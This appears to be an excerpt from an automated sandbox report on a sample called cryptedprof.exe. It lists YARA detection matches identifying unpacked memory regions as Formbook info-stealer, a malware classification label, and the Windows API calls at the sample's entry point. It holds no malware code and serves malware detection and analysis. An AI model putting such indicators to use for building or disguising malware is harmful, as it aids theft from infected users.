          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486